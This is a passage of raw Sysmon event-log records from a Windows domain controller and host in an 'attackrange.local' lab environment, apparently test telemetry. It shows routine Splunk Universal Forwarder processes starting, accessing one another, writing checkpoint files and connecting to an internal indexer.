Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.946{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D3E6F96BFF2DD94CAE581EFAEC5F91,SHA256=68F3AF03FDCDE51876B4E5E771BDB1585F604CDC239FA420CA1567097C5A4C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A17F131E477E34E8B428A9A744AB804,SHA256=A2398C268027DBDE23301694485B028EFEE9C7281556A055AB0E6FBBC92259A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.320{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B81ACEADF868A196FDEA45104859CBB,SHA256=2D076083F03A1F6C139CA0A67AC92F68684F0B5B89D9ADDFB57FDDFF2B294F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5EC2BEB8B9F24362E5A8363BC1B526D,SHA256=288D88ACD00F9DF9B38268EED6E0F7492EC3D6F3BC612C4A320A6F3C3E90896D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.778{466BC892-F90D-60EB-177E-00000000CF01}53368612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=072202136AED2240DD7DBE6E77710312,SHA256=D9202AE5BB2C6A33B62A120B6732BA301585FDD2A99F15CDEB24C502CA03516F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.515{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.510{466BC892-F90D-60EB-177E-00000000CF01}5336C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001055677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.277{466BC892-F90C-60EB-167E-00000000CF01}73962248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810944Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0C8F635A18A736AABA19ABE8C44740,SHA256=B185318C747ECD4EFE62078D16173B5CB85471892FD2145E4AEE14A207008EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810943Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B01C883E430F46B550733700979ECE77,SHA256=0117AC8F48BAD28CFF1BCADC607AA36AC4662D78DF8BF3920A79836C83FC4639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810942Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:54.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=731DDF146AA3BD63B685DB17E01BC9B6,SHA256=66C6E4A128E5C48CE42E755E25A9F5717E8ED99FEB6DE804ABDDCEB543FABECF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.563{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57CC37870EAC652C9F554F5AEB54D692,SHA256=925A7717AF5B1E6EFC22AA34FC23282957679685AFD8A966DB3255E612B80593,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810941Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.211{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57503-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001055697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:46.584{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62014-false10.0.1.12-8000- 10341000x80000000000000001055696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:54.047{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055693Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:54.047{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90E-60EB-187E-00000000CF01}6760C:\Program 